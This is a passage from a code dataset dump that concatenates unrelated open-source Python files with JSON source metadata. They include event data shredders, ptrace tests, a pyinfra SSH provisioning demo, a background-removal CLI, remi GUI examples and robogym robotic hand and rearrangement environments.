description = _('This will remove all cached ticket files. No download will be offered.')
def generate_files(self) -> List[Tuple[str, str, str]]:
pass
@transaction.atomic
def shred_data(self):
CachedTicket.objects.filter(order_position__order__event=self.event).delete()
CachedCombinedTicket.objects.filter(order__event=self.event).delete()
class PaymentInfoShredder(BaseDataShredder):
verbose_name = _('Payment information')
identifier = 'payment_info'
tax_relevant = True
description = _('This will remove payment-related information. Depending on the payment method, all data will be '
'removed or personal data only. No download will be offered.')
def generate_files(self) -> List[Tuple[str, str, str]]:
pass
@transaction.atomic
def shred_data(self):
provs = self.event.get_payment_providers()
for obj in OrderPayment.objects.filter(order__event=self.event):
pprov = provs.get(obj.provider)
if pprov:
pprov.shred_payment_info(obj)
for obj in OrderRefund.objects.filter(order__event=self.event):
pprov = provs.get(obj.provider)
if pprov:
pprov.shred_payment_info(obj)
@receiver(register_data_shredders, dispatch_uid="shredders_builtin")
def register_core_shredders(sender, **kwargs):
return [
EmailAddressShredder,
PhoneNumberShredder,
AttendeeInfoShredder,
InvoiceAddressShredder,
QuestionAnswerShredder,
InvoiceShredder,
CachedTicketShredder,
PaymentInfoShredder,
WaitingListShredder
]
``` |
{
"source": "0xflotus/ptracer",
"score": 2
} |
#### File: ptracer/tests/test_ptracer.py
```python
import errno
import os
import re
import threading
import unittest
try:
from unittest import mock
except ImportError:
import mock
import ptracer
eperm_mock = mock.Mock(
side_effect=OSError(errno.EPERM, 'Operation not permitted'))
class TestPtracer(unittest.TestCase):
@mock.patch('ptracer.ptrace.attach_and_wait', eperm_mock)
def test_ptracer__fail_01(self):
with self.assertRaisesRegexp(ptracer.PtracerError,
'Operation not permitted'):
with ptracer.context(lambda s: None):
f = open('/dev/zero', 'r')
f.close()
@mock.patch('ptracer.ptrace.syscall', eperm_mock)
def test_ptracer__fail_02(self):
with self.assertRaisesRegexp(ptracer.PtracerError,
'Operation not permitted'):
with ptracer.context(lambda s: None):
f = open('/dev/zero', 'r')
f.close()
@mock.patch('ptracer.ptrace.syscall_exit', eperm_mock)
def test_ptracer__fail_03(self):
with self.assertRaisesRegexp(ptracer.PtracerError,
'Operation not permitted'):
with ptracer.context(lambda s: None):
f = open('/dev/zero', 'r')
f.close()
@mock.patch('ptracer.ptrace.ptrace.getsiginfo', eperm_mock)
def test_ptracer__fail_04(self):
with self.assertRaisesRegexp(ptracer.PtracerError,
'Operation not permitted'):
with ptracer.context(lambda s: None):
f = open('/dev/zero', 'r')
f.close()
def test_ptracer_basic(self):
syscalls = []
with ptracer.context(syscalls.append):
f = open('/dev/zero', 'r')
f.close()
self.assertGreater(len(syscalls), 0)
def test_ptracer_filter_01(self):
syscalls = []
def _trace(pattern):
syscalls[:] = []
with ptracer.context(syscalls.append, filter=pattern):
f = open('/dev/null', 'w')
f.close()
f = open('/dev/zero', 'r')
f.close()
try:
open('/dev/nonexistent', 'r')
except IOError:
pass
_trace([
ptracer.SysCallPattern(name=re.compile('op.*'))
])
self.assertEqual(len(syscalls), 3)
_trace([
ptracer.SysCallPattern(
name=re.compile('openat'),
args=[
None,
b'/dev/null'
]
)
])
self.assertEqual(len(syscalls), 1)
_trace([
ptracer.SysCallPattern(
name=re.compile('openat'),
args=[
None,
b'/dev/null'
]
)
])
self.assertEqual(len(syscalls), 1)
_trace([
ptracer.SysCallPattern(
name=re.compile('openat'),
args=[
None,
None,
lambda arg: arg.value & os.O_WRONLY
]
)
])
self.assertEqual(len(syscalls), 1)
_trace([
ptracer.SysCallPattern(
name=re.compile('op.*'),
result=lambda res: res.value < 0
)
])
self.assertEqual(len(syscalls), 1)
def test_ptracer_threading(self):
syscalls = []
def _thread():
f = open('/dev/zero', 'r')
f.close()
flt = ptracer.SysCallPattern(
name='openat',
args=[
None,
b'/dev/zero'
]
)
with ptracer.context(syscalls.append, filter=flt):
thread = threading.Thread(target=_thread)
thread.start()
thread.join()
self.assertEqual(len(syscalls), 1)
``` |
{
"source": "0xflotus/pyheck",
"score": 2
} |
#### File: 0xflotus/pyheck/noxfile.py
```python
import nox
@nox.session
def python(session):
session.install("pytest", "maturin", "sphinx")
session.install(".", "--no-build-isolation")
session.run("make", "test", external=True)
``` |
{
"source": "0xflotus/pyinfra",
"score": 2
} |
#### File: examples/ssh_demo/ssh_demo1.py
```python
from pyinfra import host, inventory
from pyinfra.operations import files, server
SUDO = True
# update the /etc/hosts file
def update_hosts_file(name, ip):
name = name.replace('@vagrant/', '')
files.line(
{'Add hosts to /etc/hosts'},
'/etc/hosts',
r' {}.example.com '.format(name),
replace='{} {}.example.com {}'.format(ip, name, name),
)
# ensure all hosts are added to each /etc/hosts file
inv = inventory.get_group('@vagrant')
for item in inv:
update_hosts_file(item.name, item.fact.ipv4_addresses['eth0'])
if host.name == '@vagrant/two':
server.hostname(
{'Set the hostname for two'},
'two.example.com',
)
if host.name == '@vagrant/one':
server.hostname(
{'Set the hostname for one'},
'one.example.com',
)
server.shell(
{'Generate vagrant ssh key'},
'sudo -u vagrant ssh-keygen -t rsa -C <EMAIL> '
'-b 4096 -N "" -q -f /home/vagrant/.ssh/id_rsa',
)
files.get(
{'Download id_rsa.pub from one'},
'/home/vagrant/.ssh/id_rsa.pub',
'/tmp/one_vagrant_id_rsa.pub',
)
``` |
{
"source": "0xflotus/pymatriz",
"score": 3
} |
#### File: pymatriz/pymatriz/exceptions.py
```python
class ApiException(Exception):
"""
Represent a controlled exception raised by the library.
"""
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
class ParsingException(Exception):
"""
Represent a controlled exception raised by the library.
"""
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
``` |
{
"source": "0xflotus/rembg",
"score": 3
} |
#### File: rembg/cmd/cli.py
```python
import argparse
import glob
import imghdr
import io
import os
import numpy as np
from PIL import Image
from ..bg import remove
def main():
ap = argparse.ArgumentParser()
ap.add_argument(
"-m",
"--model",
default="u2net",
type=str,
choices=("u2net", "u2netp"),
help="The model name.",
)
ap.add_argument(
"-p", "--path", nargs="+", help="Path of a file or a folder of files.",
)
ap.add_argument(
"-o",
"--output",
nargs="?",
default="-",
type=argparse.FileType("wb"),
help="Path to the output png image.",
)
ap.add_argument(
"input",
nargs="?",
default="-",
type=argparse.FileType("rb"),
help="Path to the input image.",
)
args = ap.parse_args()
r = lambda i: i.buffer.read() if hasattr(i, "buffer") else i.read()
w = lambda o, data: o.buffer.write(data) if hasattr(o, "buffer") else o.write(data)
if args.path:
full_paths = [os.path.abspath(path) for path in args.path]
files = set()
for path in full_paths:
if os.path.isfile(path):
files.add(path)
else:
full_paths += glob.glob(path + "/*")
for fi in files:
if imghdr.what(fi) is None:
continue
with open(fi, "rb") as input:
with open(os.path.splitext(fi)[0] + ".out.png", "wb") as output:
w(output, remove(r(input), args.model))
else:
w(args.output, remove(r(args.input), args.model))
if __name__ == "__main__":
main()
``` |
{
"source": "0xflotus/remi",
"score": 3
} |
#### File: remi/examples/matplotlib_app.py
```python
""" This simple example shows how to display a matplotlib plot image.
The MatplotImage gets addressed by url requests that points to
a specific method. The displayed image url points to "get_image_data"
Passing an additional parameter "update_index" we inform the browser
about an image change so forcing the image update.
"""
import io
import time
import threading
import random
import remi.gui as gui
from remi import start, App
from matplotlib.figure import Figure
from matplotlib.backends.backend_agg import FigureCanvasAgg
class MatplotImage(gui.Image):
ax = None
def __init__(self, **kwargs):
super(MatplotImage, self).__init__("/%s/get_image_data?update_index=0" % id(self), **kwargs)
self._buf = None
self._buflock = threading.Lock()
self._fig = Figure(figsize=(4, 4))
self.ax = self._fig.add_subplot(111)
self.redraw()
def redraw(self):
canv = FigureCanvasAgg(self._fig)
buf = io.BytesIO()
canv.print_figure(buf, format='png')
with self._buflock:
if self._buf is not None:
self._buf.close()
self._buf = buf
i = int(time.time() * 1e6)
self.attributes['src'] = "/%s/get_image_data?update_index=%d" % (id(self), i)
super(MatplotImage, self).redraw()
def get_image_data(self, update_index):
with self._buflock:
if self._buf is None:
return None
self._buf.seek(0)
data = self._buf.read()
return [data, {'Content-type': 'image/png'}]
class MyApp(App):
def __init__(self, *args):
super(MyApp, self).__init__(*args)
def main(self):
wid = gui.VBox(width=320, height=320, margin='0px auto')
wid.style['text-align'] = 'center'
bt = gui.Button('Data', width=100, height=30)
bt.style['margin'] = '10px'
bt.onclick.connect(self.on_button_pressed)
self.plot_data = [0, 1]
self.mpl = MatplotImage(width=250, height=250)
self.mpl.style['margin'] = '10px'
self.mpl.ax.set_title("test")
self.mpl.ax.plot(self.plot_data)
self.mpl.redraw()
wid.append(bt)
wid.append(self.mpl)
return wid
def on_button_pressed(self, widget):
self.plot_data.append(random.random())
self.mpl.ax.plot(self.plot_data)
self.mpl.redraw()
if __name__ == "__main__":
start(MyApp, debug=True, address='0.0.0.0', port=0)
```
#### File: remi/examples/root_widget_change_app.py
```python
import remi.gui as gui
from remi import start, App
import os
class MyApp(App):
def __init__(self, *args):
res_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'res')
#static_file_path can be an array of strings allowing to define
# multiple resource path in where the resources will be placed
super(MyApp, self).__init__(*args, static_file_path=res_path)
def main(self):
#creating two "pages" widgets to be shown alternatively
lbl = gui.Label("Page 2. Press the button to change the page.", style={'font-size':'20px'})
bt2 = gui.Button("change page")
page2 = gui.HBox(children=[lbl, bt2], style={'margin':'0px auto', 'background-color':'lightgray'})
lbl = gui.Label("Page 1. Press the button to change the page.", style={'font-size':'20px'})
bt1 = gui.Button("change page")
page1 = gui.VBox(children=[lbl, bt1], style={'width':'300px', 'height':'200px', 'margin':'0px auto', 'background-color':'white'})
bt1.onclick.connect(self.set_different_root_widget, page2)
bt2.onclick.connect(self.set_different_root_widget, page1)
# returning the root widget
return page1
def set_different_root_widget(self, emitter, page_to_be_shown):
self.set_root_widget(page_to_be_shown)
if __name__ == "__main__":
# starts the webserver
start(MyApp, address='0.0.0.0', port=0, start_browser=True, username=None, password=<PASSWORD>)
``` |
{
"source": "0xflotus/robogym",
"score": 3
} |
#### File: dactyl/goals/face_curriculum.py
```python
import typing
import numpy as np
from robogym.envs.dactyl.common import cube_utils
from robogym.goal.goal_generator import GoalGenerator
from robogym.utils import rotation
class FaceCurriculumGoal(GoalGenerator):
""" 'Face curriculum' goal generation. Generate goals that specify a fully aligned cube at a
desired orientation with the specified face being up.
"""
def __init__(
self,
mujoco_simulation,
success_threshold: dict,
face_geom_names: typing.List[str],
goal_directions: typing.Optional[typing.List[str]] = None,
round_target_face: bool = True,
p_face_flip: float = 0.25,
):
"""
Create new FaceCurriculumGoal object
:param mujoco_simulation: A SimulationInterface object for a mujoco simulation considered
:param success_threshold: Dictionary of threshold levels for cube orientation and face
rotation, for which we consider the cube "aligned" with the goal
:param face_geom_names: Names of 6 face geoms of the cube for which we measure the rotation
:param goal_directions: Whether to rotate faces only clockwise, counterclockwise or both
:param round_target_face: Whether target face rotations should be only round angles
(multiplies of pi/2) or not
:param p_face_flip: If the cube is aligned, what is the probability of flipping the cube
vs rotating the face
"""
super().__init__()
assert len(face_geom_names) in {2, 6}, "Only supports full cube or face cube"
self.mujoco_simulation = mujoco_simulation
self.success_threshold = success_threshold
self.face_geom_names = face_geom_names
if goal_directions is None:
self.goal_directions = ["cw", "ccw"]
else:
self.goal_directions = goal_directions
self.round_target_face = round_target_face
self.p_face_flip = p_face_flip
self.goal_quat_for_face = cube_utils.face_up_quats(
mujoco_simulation.sim, "cube:cube:rot", self.face_geom_names
)
def next_goal(self, random_state, current_state):
""" Generate a new goal from current cube goal state """
cube_pos = current_state["cube_pos"]
cube_quat = current_state["cube_quat"]
cube_face = current_state["cube_face_angle"]
# Success threshold parameters
face_threshold = self.success_threshold["cube_face_angle"]
rot_threshold = self.success_threshold["cube_quat"]
self.mujoco_simulation.clone_target_from_cube()
self.mujoco_simulation.align_target_faces()
rounded_current_face = rotation.round_to_straight_angles(cube_face)
# Face aligned - are faces in the current cube aligned within the threshold
current_face_diff = rotation.normalize_angles(cube_face - rounded_current_face)
face_aligned = np.linalg.norm(current_face_diff, axis=-1) < face_threshold
# Z aligned - is there a cube face looking up within the rotation threshold
if len(self.face_geom_names) == 2:
z_aligned = rotation.rot_z_aligned(cube_quat, rot_threshold)
else: # len(self.face_geom_names) == 6
z_aligned = rotation.rot_xyz_aligned(cube_quat, rot_threshold)
# Do reorientation - with some probability, just reorient the cube
do_reorientation = random_state.uniform() < self.p_face_flip
# Rotate face - should we rotate face or reorient the cube
rotate_face = face_aligned and z_aligned and not do_reorientation
if rotate_face:
# Chose index from the geoms that is highest on the z axis
face_to_shift = cube_utils.face_up(
self.mujoco_simulation.sim, self.face_geom_names
)
# Rotate given face by a random angle and return both, new rotations and an angle
goal_face, delta_angle = cube_utils.rotated_face_with_angle(
cube_face,
face_to_shift,
random_state,
self.round_target_face,
directions=self.goal_directions,
)
if len(self.face_geom_names) == 2:
self.mujoco_simulation.rotate_target_face(face_to_shift, delta_angle)
else:
self.mujoco_simulation.rotate_target_face(
face_to_shift // 2, face_to_shift % 2, delta_angle
)
goal_quat = rotation.round_to_straight_quat(cube_quat)
else: # need to flip cube
# Gaol for face rotations is just aligning them
goal_face = rounded_current_face
# Make the goal so that a given face is straight up
candidates = list(range(len(self.face_geom_names)))
face_to_shift = random_state.choice(candidates)
z_quat = cube_utils.uniform_z_aligned_quat(random_state)
face_up_quat = self.goal_quat_for_face[face_to_shift]
goal_quat = rotation.quat_mul(z_quat, face_up_quat)
goal_quat = rotation.quat_normalize(goal_quat)
return {
"cube_pos": cube_pos,
"cube_quat": goal_quat,
"cube_face_angle": goal_face,
"goal_type": "rotation" if rotate_face else "flip",
}
def current_state(self):
""" Extract current cube goal state """
cube_pos = np.zeros(3)
return {
"cube_pos": cube_pos,
"cube_quat": self.mujoco_simulation.get_qpos("cube_rotation"),
"cube_face_angle": self.mujoco_simulation.get_face_angles("cube"),
}
def relative_goal(self, goal_state, current_state):
"""
Calculate a difference in the 'goal space' between current state and the target goal
"""
return {
# Cube pos does not count
"cube_pos": np.zeros(goal_state["cube_pos"].shape),
# Quaternion difference of a rotation
"cube_quat": rotation.quat_difference(
goal_state["cube_quat"], current_state["cube_quat"]
),
# Angle differences
"cube_face_angle": rotation.normalize_angles(
goal_state["cube_face_angle"] - current_state["cube_face_angle"]
),
}
def goal_distance(self, goal_state, current_state):
""" Distance from the current goal to the target state. """
relative_goal = self.relative_goal(goal_state, current_state)
goal_distance = {
"cube_pos": 0.0,
"cube_quat": rotation.quat_magnitude(relative_goal["cube_quat"]),
"cube_face_angle": np.linalg.norm(relative_goal["cube_face_angle"]),
}
return goal_distance
def goal_types(self) -> typing.Set[str]:
return {"rotation", "flip"}
```
#### File: dactyl/goals/fixed_fair_scramble.py
```python
import logging
from robogym.envs.dactyl.goals.face_cube_solver import FaceCubeSolverGoal
logger = logging.getLogger(__name__)
class FixedFairScrambleGoal(FaceCubeSolverGoal):
"""
Generates a series of goals to apply a "fair scramble" to a fully solved Rubik's cube.
The fair scramble was generated using the WCA app and was not cherry-picked:
https://www.worldcubeassociation.org/regulations/scrambles/
Goals are generated in a way to always rotate the top face.
"""
def _generate_solution_sequence(self, cube):
solution = "L2 U2 R2 B D2 B2 D2 L2 F' D' R B F L U' F D' L2"
return self._normalize_actions(solution.split())
```
#### File: dactyl/goals/shadow_hand_reach_fingertip_pos.py
```python
import numpy as np
from numpy.random import RandomState
from robogym.envs.dactyl.reach import ReachSimulation
from robogym.goal.goal_generator import GoalGenerator
from robogym.robot.shadow_hand.hand_forward_kinematics import FINGERTIP_SITE_NAMES
from robogym.utils.dactyl_utils import actuated_joint_range
class FingertipPosGoal(GoalGenerator):
"""
Goal generation to sample random qpos within actuator control range.
"""
def __init__(
self, mujoco_simulation: ReachSimulation, goal_simulation: ReachSimulation
):
"""
Create new FingertipPosGoal object
"""
self.mujoco_simulation = mujoco_simulation
self.goal_simulation = goal_simulation
self.goal_joint_pos = mujoco_simulation.shadow_hand.observe().joint_positions()
super().__init__()
def next_goal(self, random_state: RandomState, current_state: dict) -> dict:
"""
Goal is defined as fingertip position.
We sample next goal by sampling actuator control within control range then use
forward kinematic to calculate fingertip position.
"""
sim = self.mujoco_simulation.mj_sim
goal_sim = self.goal_simulation.mj_sim
# We need to update control range and joint range for goal simulation because
# they can be changed by randomizers.
goal_sim.model.jnt_range[:] = sim.model.jnt_range
goal_sim.model.actuator_ctrlrange[:] = sim.model.actuator_ctrlrange
# Sample around current pose of the fingers in joint space.
joint_limits = actuated_joint_range(sim)
joint_range = joint_limits[:, 1] - joint_limits[:, 0]
goal_joint_pos = random_state.normal(
loc=self.goal_joint_pos, scale=0.1 * joint_range
)
goal_joint_pos = np.clip(goal_joint_pos, joint_limits[:, 0], joint_limits[:, 1])
# replace state to ensure reachability with current model
self.goal_simulation.set_qpos("robot0:hand_joint_angles", goal_joint_pos)
self.goal_simulation.forward()
# take a few steps to avoid goals that are impossible due to contacts
for steps in range(2):
self.goal_simulation.shadow_hand.set_position_control(
self.goal_simulation.shadow_hand.denormalize_position_control(
self.goal_simulation.shadow_hand.zero_control(),
relative_action=True,
)
)
self.goal_simulation.step()
self.goal_joint_pos = (
self.goal_simulation.shadow_hand.observe().joint_positions()
)
return {
"fingertip_pos": self._get_fingertip_position(self.goal_simulation),
}
def current_state(self) -> dict:
""" Extract current cube goal state """
return {"fingertip_pos": self._get_fingertip_position(self.mujoco_simulation)}
def relative_goal(self, goal_state: dict, current_state: dict) -> dict:
return {
"fingertip_pos": goal_state["fingertip_pos"]
- current_state["fingertip_pos"]
}
def goal_distance(self, goal_state: dict, current_state: dict) -> dict:
relative_goal = self.relative_goal(goal_state, current_state)
return {"fingertip_pos": np.linalg.norm(relative_goal["fingertip_pos"])}
@staticmethod
def _get_fingertip_position(simulation: ReachSimulation):
"""
Get absolute fingertip positions in mujoco frame.
"""
fingertip_pos = np.array(
[
simulation.mj_sim.data.get_site_xpos(f"robot0:{site}")
for site in FINGERTIP_SITE_NAMES
]
)
fingertip_pos = fingertip_pos.flatten()
return fingertip_pos
```
#### File: dactyl/goals/unconstrained_cube_solver.py
```python
import logging
import typing
import numpy as np
from robogym.envs.dactyl.goals.rubik_cube_solver import RubikCubeSolver
from robogym.utils import rotation
logger = logging.getLogger(__name__)
class UnconstrainedCubeSolver(RubikCubeSolver):
"""
Generates a series of goals to solve a Rubik's cube.
Goals are not constrained to apply to a particular face.
"""
def __init__(
self,
mujoco_simulation,
success_threshold: typing.Dict[str, float],
face_geom_names: typing.List[str],
num_scramble_steps: int,
):
"""
Creates new UnconstrainedCubeSolver object
"""
self.success_threshold = success_threshold
super().__init__(
mujoco_simulation=mujoco_simulation,
face_geom_names=face_geom_names,
num_scramble_steps=num_scramble_steps,
)
def _is_goal_met(self, current_face_state, threshold):
"""
Check if current face state matches current goal state.
"""
face_diff = rotation.normalize_angles(current_face_state - self.goal_face_state)
return np.linalg.norm(face_diff, axis=-1) < threshold
def next_goal(self, random_state, current_state):
""" Generates a new goal from current cube goal state """
cube_pos = current_state["cube_pos"]
cube_quat = current_state["cube_quat"]
cube_face = current_state["cube_face_angle"]
# Success threshold parameters
face_threshold = self.success_threshold["cube_face_angle"]
# Check if current state already meets goal state.
if self._is_goal_met(cube_face, face_threshold):
# Step forward in goal sequence to get next goal.
self._step_goal()
# Directly rotate the face indicated by the goal action.
goal_action = self._get_goal_action()
face_to_shift = goal_action.face_idx
self.mujoco_simulation.target_model.rotate_face(
face_to_shift // 2, face_to_shift % 2, goal_action.face_angle
)
# align cube quat for visualization purposes, has no effect on goal being met
cube_quat = rotation.quat_normalize(rotation.round_to_straight_quat(cube_quat))
return {
"cube_pos": cube_pos,
"cube_quat": cube_quat,
"cube_face_angle": self.goal_face_state,
"goal_type": "rotation",
}
def relative_goal(self, goal_state, current_state):
"""
Calculate a difference in the 'goal space' between current state and the target goal
"""
goal_type = goal_state["goal_type"]
assert goal_type == "rotation", 'unknown goal_type "{}"'.format(goal_type)
return {
# Cube pos does not count
"cube_pos": np.zeros(goal_state["cube_pos"].shape),
# Quaternion difference of a rotation
"cube_quat": np.zeros(goal_state["cube_quat"].shape),
# Angle differences
"cube_face_angle": rotation.normalize_angles(
goal_state["cube_face_angle"] - current_state["cube_face_angle"]
),
}
def goal_distance(self, goal_state, current_state):
""" Distance from the current goal to the target state. """
relative_goal = self.relative_goal(goal_state, current_state)
goal_distance = {
"cube_pos": 0.0,
"cube_quat": 0.0, # qpos has no effect on whether we consider goal achieved
"cube_face_angle": np.linalg.norm(relative_goal["cube_face_angle"]),
"steps_to_solve": len(self.goal_sequence)
- (self.goal_step % len(self.goal_sequence)),
}
return goal_distance
def goal_reachable(self, goal_state, current_state):
""" Check if goal is in reach from current state."""
relative_goal = self.relative_goal(goal_state, current_state)
face_rotation_angles = relative_goal["cube_face_angle"]
goal_type = goal_state["goal_type"]
assert goal_type == "rotation", 'unknown goal_type "{}"'.format(goal_type)
eps = 1e-6
rounded_rotation_angles = rotation.round_to_straight_angles(
np.abs(rotation.normalize_angles(face_rotation_angles))
)
rotated_faces = list(np.where(rounded_rotation_angles > eps)[0])
goal_face_idx = self._get_goal_action().face_idx
return rounded_rotation_angles[
goal_face_idx
] < np.pi / 2 + eps and rotated_faces in ([], [goal_face_idx])
```
#### File: envs/dactyl/reach.py
```python
import functools
import typing
import attr
import numpy as np
from robogym.envs.dactyl.observation.reach import (
GoalFingertipPosObservation,
GoalIsAchievedObservation,
)
from robogym.envs.dactyl.observation.shadow_hand import (
MujocoShadowhandAbsoluteFingertipsObservation,
MujocoShadowHandJointPosObservation,
MujocoShadowHandJointVelocityObservation,
)
from robogym.goal.goal_generator import GoalGenerator
from robogym.mujoco.mujoco_xml import MujocoXML
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.observation.goal import GoalObservationProvider
from robogym.observation.mujoco import MujocoObservationProvider, ObservationProvider
from robogym.robot.shadow_hand.hand_forward_kinematics import FINGERTIP_SITE_NAMES
from robogym.robot.shadow_hand.mujoco.mujoco_shadow_hand import MuJoCoShadowHand
from robogym.robot_env import ObservationMapValue as omv
from robogym.robot_env import RobotEnv, RobotEnvConstants, RobotEnvParameters
from robogym.wrappers import dactyl, randomizations, util
DEFAULT_NOISE_LEVELS: typing.Dict[str, dict] = {
"fingertip_pos": {"uncorrelated": 0.001, "additive": 0.001},
}
NO_NOISE_LEVELS: typing.Dict[str, dict] = {
key: {} for key in DEFAULT_NOISE_LEVELS.keys()
}
@attr.s(auto_attribs=True)
class ReachEnvParameters(RobotEnvParameters):
""" Parameters of the shadow hand reach env - possible to change for each episode. """
pass
@attr.s(auto_attribs=True)
class ReachEnvConstants(RobotEnvConstants):
""" Parameters of the shadow hand reach env - same for all episodes. """
success_threshold: dict = {"fingertip_pos": 0.025}
# If specified, freeze all other fingers.
active_finger: typing.Optional[str] = None
# Overwrite the following constants regarding rewards.
successes_needed: int = 50
max_timesteps_per_goal: int = 150
class ReachSimulation(SimulationInterface):
"""
Simulation interface for shadow hand reach env.
"""
# Just a floor
FLOOR_XML = "floor/basic_floor.xml"
# Target fingertip sites.
TARGET_XML = "shadowhand_reach/target.xml"
# Robot hand xml
HAND_XML = "robot/shadowhand/main.xml"
# XML with default light
LIGHT_XML = "light/default.xml"
def __init__(self, sim):
super().__init__(sim)
self.enable_pid()
self.shadow_hand = MuJoCoShadowHand(self)
@classmethod
def build(cls, n_substeps: int = 10):
"""Construct a ShadowHandReachSimulation object.
:param n_substeps: (int) sim.nsubsteps, num of substeps
:return: a ShadowHandReachSimulation object with properly constructed sim.
"""
xml = MujocoXML()
xml.add_default_compiler_directive()
xml.append(
MujocoXML.parse(cls.FLOOR_XML).set_named_objects_attr(
"floor", tag="body", pos=[1, 1, 0]
)
)
target = MujocoXML.parse(cls.TARGET_XML)
colors = [
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 1.0],
[1.0, 1.0, 0.0, 1.0],
[1.0, 0.0, 1.0, 1.0],
]
for site, color in zip(FINGERTIP_SITE_NAMES, colors):
target.set_named_objects_attr(
f"target_{site}",
pos=[0.5, 0.5, 0.0],
type="sphere",
rgba=color,
size=0.005,
)
xml.append(target)
xml.append(
MujocoXML.parse(cls.HAND_XML)
.add_name_prefix("robot0:")
.set_named_objects_attr(
"robot0:hand_mount",
tag="body",
pos=[1.0, 1.25, 0.15],
euler=[np.pi / 2, 0, np.pi],
)
.remove_objects_by_name("robot0:annotation:outer_bound")
# Remove hand base free joint so that hand is immovable
.remove_objects_by_name("robot0:hand_base")
)
xml.append(MujocoXML.parse(cls.LIGHT_XML))
simulation = cls(xml.build(nsubsteps=n_substeps))
# Move fingers out of the way.
simulation.shadow_hand.set_position_control(
simulation.shadow_hand.denormalize_position_control(
simulation.shadow_hand.zero_control()
)
)
for _ in range(20):
simulation.step()
return simulation
class ReachEnv(RobotEnv[ReachEnvParameters, ReachEnvConstants, ReachSimulation]):
"""
Environment with the ShadowHand and a locked cube (i.e. no moving pieces, just a solid
block).
"""
def _build_observation_providers(self):
"""
Initialize observation providers for the environment.
"""
providers: typing.Dict[str, ObservationProvider] = {
"mujoco": MujocoObservationProvider(self.mujoco_simulation),
"goal": GoalObservationProvider(lambda: self.goal_info()),
}
return providers
def _default_observation_map(self):
return {
"qpos": omv({"mujoco": MujocoShadowHandJointPosObservation}),
"qvel": omv({"mujoco": MujocoShadowHandJointVelocityObservation}),
"fingertip_pos": omv(
{"mujoco": MujocoShadowhandAbsoluteFingertipsObservation}
),
"goal_fingertip_pos": omv({"goal": GoalFingertipPosObservation}),
"is_goal_achieved": omv({"goal": GoalIsAchievedObservation}),
}
@classmethod
def build_goal_generation(
cls, constants, mujoco_simulation: ReachSimulation
) -> GoalGenerator:
""" Construct a goal generation object """
goal_simulation = ReachSimulation.build(n_substeps=mujoco_simulation.n_substeps)
sim = goal_simulation.mj_sim
# Make sure fingers are separated.
# For transfer, want to make sure post-noise locations are achievable.
sim.model.geom_margin[:] = sim.model.geom_margin + 0.002
from robogym.envs.dactyl.goals.shadow_hand_reach_fingertip_pos import (
FingertipPosGoal,
)
return FingertipPosGoal(mujoco_simulation, goal_simulation)
@classmethod
def build_simulation(cls, constants, parameters):
return ReachSimulation.build(n_substeps=constants.mujoco_substeps)
@classmethod
def build_robot(cls, mujoco_simulation, physical):
return mujoco_simulation.shadow_hand
def _render_callback(self, _sim, _viewer):
""" Set a render callback """
goal_fingertip_pos = self._goal["fingertip_pos"].reshape(-1, 3)
for finger_idx, site in enumerate(FINGERTIP_SITE_NAMES):
goal_pos = goal_fingertip_pos[finger_idx]
site_id = _sim.model.site_name2id(f"target_{site}")
_sim.data.site_xpos[site_id] = goal_pos
def _reset(self):
super()._reset()
self.constants.success_pause_range_s = (0.0, 0.5)
def apply_wrappers(self, **wrapper_params):
"""
Apply wrappers to the environment.
"""
self.constants: ReachEnvConstants
env = util.ClipActionWrapper(self)
if self.constants.active_finger is not None:
env = dactyl.FingerSeparationWrapper(
env, active_finger=self.constants.active_finger
)
if self.constants.randomize:
env = randomizations.RandomizedActionLatency(env)
env = randomizations.RandomizedBodyInertiaWrapper(env)
env = randomizations.RandomizedTimestepWrapper(env)
env = randomizations.RandomizedRobotFrictionWrapper(env)
env = randomizations.RandomizedGravityWrapper(env)
env = dactyl.RandomizedPhasespaceFingersWrapper(env)
env = dactyl.RandomizedRobotDampingWrapper(env)
env = dactyl.RandomizedRobotKpWrapper(env)
noise_levels = DEFAULT_NOISE_LEVELS
else:
noise_levels = NO_NOISE_LEVELS
# must happen before angle observation wrapper
env = randomizations.RandomizeObservationWrapper(env, levels=noise_levels)
if self.constants.randomize:
env = dactyl.FingersFreezingPhasespaceMarkers(env)
env = randomizations.ActionNoiseWrapper(env)
env = util.SmoothActionWrapper(
env
) # this get's applied before noise is added (important)
env = util.RelativeGoalWrapper(env)
env = util.UnifiedGoalObservationWrapper(env, goal_parts=["fingertip_pos"])
env = util.ClipObservationWrapper(env)
env = util.ClipRewardWrapper(env)
env = util.PreviousActionObservationWrapper(env)
env = util.DiscretizeActionWrapper(
env, n_action_bins=self.constants.n_action_bins
)
# Note: Recording wrapper is removed here to favor simplicity.
return env
make_simple_env = functools.partial(ReachEnv.build, apply_wrappers=False)
make_env = ReachEnv.build
```
#### File: envs/rearrange/blocks_duplicate.py
```python
from typing import List
from robogym.envs.rearrange.blocks import BlockRearrangeEnv
from robogym.envs.rearrange.simulation.base import ObjectGroupConfig
class DuplicateBlockRearrangeEnv(BlockRearrangeEnv):
def _sample_random_object_groups(
self, dedupe_objects: bool = False
) -> List[ObjectGroupConfig]:
"""
Create one group of block objects with a random color.
Overwrite the object groups info to contain only one group for all the blocks.
"""
object_groups = super()._sample_random_object_groups()
num_objects = self.parameters.simulation_params.num_objects
first_object_group = object_groups[0]
first_object_group.count = num_objects
first_object_group.object_ids = list(range(num_objects))
object_groups = [first_object_group]
return object_groups
make_env = DuplicateBlockRearrangeEnv.build
```
#### File: envs/rearrange/blocks_pickandplace.py
```python
from robogym.envs.rearrange.blocks import BlockRearrangeEnv
from robogym.envs.rearrange.common.base import RearrangeEnvConstants
from robogym.envs.rearrange.goals.pickandplace import PickAndPlaceGoal
from robogym.envs.rearrange.simulation.blocks import BlockRearrangeSim
class BlocksPickAndPlaceEnv(BlockRearrangeEnv):
@classmethod
def build_goal_generation(
cls, constants: RearrangeEnvConstants, mujoco_simulation: BlockRearrangeSim
):
return PickAndPlaceGoal(mujoco_simulation, constants.goal_args)
make_env = BlocksPickAndPlaceEnv.build
```
#### File: rearrange/common/utils.py
```python
import collections
import glob
import itertools
import json
import logging
import os
from copy import deepcopy
from functools import lru_cache
from typing import Callable, Dict, List, NamedTuple, Optional, Tuple, Union
import _jsonnet
import numpy as np
import trimesh
